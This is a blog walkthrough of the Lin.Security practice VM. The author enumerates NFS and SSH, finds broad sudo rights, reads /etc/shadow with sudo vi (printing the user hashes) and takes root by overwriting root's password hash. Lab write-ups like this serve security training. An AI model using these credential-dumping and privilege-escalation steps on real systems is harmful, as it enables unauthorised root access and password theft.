Lin.Security 1

I'm going to try to finish my initial VM list from way back when I started this blog within the next week and move onto learning some Windows shit. It's 2021 and still, most corporate networks and using Windows.

Recon

  • VM published 11 Jul, 2018
  • Author is a Pentesting company, website still up and appears to be active
  • They give us initial credentials on their website: bob/secret
  • Image is Ubuntu 18.04 LTS I'm assuming if they give us initial credentials, this one actually isn't going to be a web attack!

Enumeration

└─$ sudo nmap -nP 10.10.10.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-28 11:46 EST
Nmap scan report for 10.10.10.1
Host is up (0.000079s latency).
All 1000 scanned ports on 10.10.10.1 are filtered
MAC Address: 08:00:27:64:8F:E2 (Oracle VirtualBox virtual NIC)
Nmap scan report for 10.10.10.6
Host is up (0.000064s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
111/tcp  open  rpcbind
2049/tcp open  nfs
MAC Address: 08:00:27:D8:9F:D6 (Oracle VirtualBox virtual NIC)
Nmap scan report for 10.10.10.4
Host is up (0.0000020s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.25 seconds

Alright well, it looks like we have a little more than just an ssh login - nfs is always fun! I suppose I'll make sure to try every path I see and at least start a scanner against this:

msf6 > search nfs
Matching Modules
================
   #  Name                                   Disclosure Date  Rank     Check  Description
   -  ----                                   ---------------  ----     -----  -----------
   0  auxiliary/dos/freebsd/nfsd/nfsd_mount                   normal   No     FreeBSD Remote NFS RPC Request Denial of Service
   1  auxiliary/scanner/nfs/nfsmount                          normal   No     NFS Mount Scanner
   2  exploit/netware/sunrpc/pkernel_callit  2009-09-30       good     No     NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow
   3  exploit/osx/local/nfs_mount_root       2014-04-11       normal   Yes    Mac OS X NFS Mount Privilege Escalation Exploit
   4  exploit/windows/ftp/labf_nfsaxe        2017-05-15       normal   No     LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow
   5  exploit/windows/ftp/xlink_client       2009-10-03       normal   No     Xlink FTP Client Buffer Overflow
   6  exploit/windows/ftp/xlink_server       2009-10-03       good     Yes    Xlink FTP Server Buffer Overflow
   7  exploit/windows/nfs/xlink_nfsd         2006-11-06       average  No     Omni-NFS Server Buffer Overflow
Interact with a module by name or index. For example info 7, use 7 or use exploit/windows/nfs/xlink_nfsd
msf6 > use 1
msf6 auxiliary(scanner/nfs/nfsmount) > info
       Name: NFS Mount Scanner
     Module: auxiliary/scanner/nfs/nfsmount
    License: Metasploit Framework License (BSD)
       Rank: Normal
Provided by:
  tebo <tebo@attackresearch.com>
Check supported:
  No
Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PROTOCOL  udp              yes       The protocol to use (Accepted: udp, tcp)
  RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     111              yes       The target port (TCP)
  THREADS   1                yes       The number of concurrent threads (max one per host)
Description:
  This module scans NFS mounts and their permissions.
References:
  https://cvedetails.com/cve/CVE-1999-0170/
  http://www.ietf.org/rfc/rfc1094.txt
msf6 auxiliary(scanner/nfs/nfsmount) > set RHOSTS 10.10.10.6
RHOSTS => 10.10.10.6
msf6 auxiliary(scanner/nfs/nfsmount) > run
[+] 10.10.10.6:111        - 10.10.10.6 NFS Export: /home/peter [*]
[*] 10.10.10.6:111        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Let's now login to the machine with our given credential and poke around a bit:

$ ssh bob@10.10.10.6

1 Cool banner!

bob@linsecurity:~$ ls -al
total 28
drwxr-xr-x 4 bob  bob  4096 Jul 10  2018 .
drwxr-xr-x 5 root root 4096 Jul  9  2018 ..
-rw-r--r-- 1 bob  bob   220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 bob  bob  3771 Apr  4  2018 .bashrc
drwx------ 2 bob  bob  4096 Jul  9  2018 .cache
-rw-rw-r-- 1 bob  bob     0 Jul  9  2018 .cloud-locale-test.skip
drwx------ 3 bob  bob  4096 Jul  9  2018 .gnupg
-rw-r--r-- 1 bob  bob   807 Apr  4  2018 .profile

Nothing interesting in home directory.

bob@linsecurity:~$ sudo -l
[sudo] password for bob: 
Matching Defaults entries for bob on linsecurity:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bob may run the following commands on linsecurity:
    (ALL) /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh, /usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect, /usr/bin/find, /usr/bin/ftp,
        /usr/bin/less, /usr/bin/man, /bin/more, /usr/bin/scp, /usr/bin/socat, /usr/bin/ssh, /usr/bin/vi, /usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim,
        /usr/bin/perl, /usr/bin/tclsh, /usr/bin/git, /usr/bin/script, /usr/bin/scp

Oh sweet jesus that's a lot of gtfobins we can run as root... Do any of them have SUID set?

$ find directory -user root -perm -4000 -exec ls -ldb {} \; >/tmp/filename
...
bob@linsecurity:/$ cat /tmp/filename 
-rwsr-xr-x 1 root root 40152 Nov 30  2017 ./snap/core/4917/bin/mount
-rwsr-xr-x 1 root root 44168 May  7  2014 ./snap/core/4917/bin/ping
-rwsr-xr-x 1 root root 44680 May  7  2014 ./snap/core/4917/bin/ping6
-rwsr-xr-x 1 root root 40128 May 17  2017 ./snap/core/4917/bin/su
-rwsr-xr-x 1 root root 27608 Nov 30  2017 ./snap/core/4917/bin/umount
-rwsr-xr-x 1 root root 71824 May 17  2017 ./snap/core/4917/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 May 17  2017 ./snap/core/4917/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 May 17  2017 ./snap/core/4917/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 May 17  2017 ./snap/core/4917/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 May 17  2017 ./snap/core/4917/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jul  4  2017 ./snap/core/4917/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jan 12  2017 ./snap/core/4917/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Jan 18  2018 ./snap/core/4917/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 98440 Jun 21  2018 ./snap/core/4917/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 390888 Jan 29  2016 ./snap/core/4917/usr/sbin/pppd
-rwsr-xr-x 1 root root 40152 Nov 30  2017 ./snap/core/4486/bin/mount
-rwsr-xr-x 1 root root 44168 May  7  2014 ./snap/core/4486/bin/ping
-rwsr-xr-x 1 root root 44680 May  7  2014 ./snap/core/4486/bin/ping6
-rwsr-xr-x 1 root root 40128 May 17  2017 ./snap/core/4486/bin/su
-rwsr-xr-x 1 root root 27608 Nov 30  2017 ./snap/core/4486/bin/umount
-rwsr-xr-x 1 root root 71824 May 17  2017 ./snap/core/4486/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 May 17  2017 ./snap/core/4486/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 May 17  2017 ./snap/core/4486/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 May 17  2017 ./snap/core/4486/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 May 17  2017 ./snap/core/4486/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jul  4  2017 ./snap/core/4486/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Jan 12  2017 ./snap/core/4486/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Jan 18  2018 ./snap/core/4486/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 94344 Apr 16  2018 ./snap/core/4486/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 390888 Jan 29  2016 ./snap/core/4486/usr/sbin/pppd
-rwsr-xr-x 1 root root 64424 Mar  9  2017 ./bin/ping
-rwsr-xr-x 1 root root 30800 Aug 11  2016 ./bin/fusermount
-rwsr-xr-x 1 root root 26696 May 16  2018 ./bin/umount
-rwsr-xr-x 1 root root 146128 Nov 30  2017 ./bin/ntfs-3g
-rwsr-xr-x 1 root root 44664 Jan 25  2018 ./bin/su
-rwsr-xr-x 1 root root 43088 May 16  2018 ./bin/mount
-rwsr-xr-x 1 root root 22520 Mar 27  2018 ./usr/bin/pkexec
-rwsr-xr-x 1 root root 18640 Oct 27  2016 ./usr/bin/netkit-rlogin
-rwsr-x--- 1 root itservices 18552 Apr 10  2018 ./usr/bin/xxd
-rwsr-xr-x 1 root root 37136 Jan 25  2018 ./usr/bin/newgidmap
-rwsr-xr-x 1 root root 40344 Jan 25  2018 ./usr/bin/newgrp
-rwsr-xr-x 1 root root 149080 Jan 18  2018 ./usr/bin/sudo
-rwsr-xr-x 1 root root 22728 Oct 27  2016 ./usr/bin/netkit-rcp
-rwsr-xr-x 1 root root 76496 Jan 25  2018 ./usr/bin/chfn
-rwsr-xr-x 1 root root 75824 Jan 25  2018 ./usr/bin/gpasswd
-rwsr-xr-x 1 root root 44528 Jan 25  2018 ./usr/bin/chsh
-rwsr-xr-x 1 root root 18448 Mar  9  2017 ./usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 37136 Jan 25  2018 ./usr/bin/newuidmap
-rwsr-xr-x 1 root root 14504 Oct 27  2016 ./usr/bin/netkit-rsh
-rwsr-sr-x 1 root root 30800 May 16  2018 ./usr/bin/taskset
-rwsr-xr-x 1 root root 59640 Jan 25  2018 ./usr/bin/passwd
-rwsr-xr-x 1 root root 10232 Mar 28  2017 ./usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 42992 Nov 15  2017 ./usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 80056 Jun  5  2018 ./usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 436552 Feb 10  2018 ./usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 14328 Mar 27  2018 ./usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-sr-x 1 root root 101208 May 16  2018 ./usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 113336 Jan 16  2018 ./sbin/mount.nfs

We can run an editor as root though... so this means we have full read access to the entire system, let's use that to dig a bit deeper shall we?

$ sudo vi /etc/shadow
root:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2/6K/UU5wLobTSz/Pw5/ILvXgq9NibQ0/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::
man:*:17647:0:99999:7:::
lp:*:17647:0:99999:7:::
mail:*:17647:0:99999:7:::
news:*:17647:0:99999:7:::
uucp:*:17647:0:99999:7:::
proxy:*:17647:0:99999:7:::
www-data:*:17647:0:99999:7:::
backup:*:17647:0:99999:7:::
list:*:17647:0:99999:7:::
irc:*:17647:0:99999:7:::
gnats:*:17647:0:99999:7:::
nobody:*:17647:0:99999:7:::
systemd-network:*:17647:0:99999:7:::
systemd-resolve:*:17647:0:99999:7:::
syslog:*:17647:0:99999:7:::
messagebus:*:17647:0:99999:7:::
_apt:*:17647:0:99999:7:::
lxd:*:17647:0:99999:7:::
uuidd:*:17647:0:99999:7:::
dnsmasq:*:17647:0:99999:7:::
landscape:*:17647:0:99999:7:::
pollinate:*:17647:0:99999:7:::
sshd:*:17647:0:99999:7:::
pkexecbob:$6$Kk0DA.6Xha4nL2p5$jq7qoit2l4ckULg1ZxcbL5wUz2Ld2ZUa.RYaIMs.Lma0EFGheX9yCXfKy37K0GsHz50FYIqIESo4QXWL.DYTI0:17721:0:99999:7:::
statd:*:17721:0:99999:7:::
peter:$6$QpjS4vUG$Zi1KcJ7cRB8TJG9A/x7GhQQvJ0RoYwG4Jxj/6R58SJddU2X/QTQKNJWzwiByeTELKeyp0vS83kPsYITbTTmlb0:17721:0:99999:7:::
susan:$6$5oSmml7K$0joeavcuzw4qxDJ2LsD1ablUIrFhycVoIXL3rxN/3q2lVpQOKLufta5tqMRIh30Gb32IBp5yZ7XvBR6uX9/SR/:17721:0:99999:7:::

Recap

  • SSH on port 22
  • nfs on port 2049
  • rpcbind on 111
  • There's an NFS mount at /home/peter
  • We can run quite a few commands as root (including an editor), this should be very useful for us

Exploitation

I should be able to just edit /etc/shadow toset my own password for root...

# Create a sha-512 hashed password:
$ mkpasswd -m sha-512 -S saltsalt -s
Password: password
$6$saltsalt$qFmFH.bQmmtXzyBY0s9v7Oicd2z4XSIecDzlB5KiA2/jctKu9YterLp8wwnSq.qc.eoxqOmSuNp2xS0ktL3nh/
bob@linsecurity:/$ sudo vi /etc/shadow
... changed root hash line to:
root:$6$saltsalt$qFmFH.bQmmtXzyBY0s9v7Oicd2z4XSIecDzlB5KiA2/jctKu9YterLp8wwnSq.qc.eoxqOmSuNp2xS0ktL3nh/:17721:0:99999:7:::
# Login with password password
bob@linsecurity:/$ su
Password: 
root@linsecurity:/# id
uid=0(root) gid=0(root) groups=0(root)

We win! There's probably a ton of ways to win this one, but I don't really care I just want quick roots to finish off these linux boxes. EASY!